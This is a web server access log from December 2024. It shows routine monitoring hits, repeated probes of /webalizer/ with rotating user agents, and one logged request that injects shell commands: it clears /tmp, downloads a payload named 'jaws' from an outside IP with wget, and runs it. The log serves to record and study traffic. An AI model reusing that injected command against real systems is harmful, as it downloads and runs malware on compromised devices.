77.105.166.134 - - [03/Dec/2024:08:31:12 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [03/Dec/2024:08:31:14 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:14 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:34 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:34 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:36 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:36 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [03/Dec/2024:08:31:39 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [03/Dec/2024:08:31:39 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
212.91.246.72 - - [03/Dec/2024:08:32:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:33:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.133.122 - - [03/Dec/2024:08:33:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Dec/2024:08:34:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:35:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:08:36:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.56.7.128 - - [03/Dec/2024:08:36:03 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+178.215.238.191/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [03/Dec/2024:08:37:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
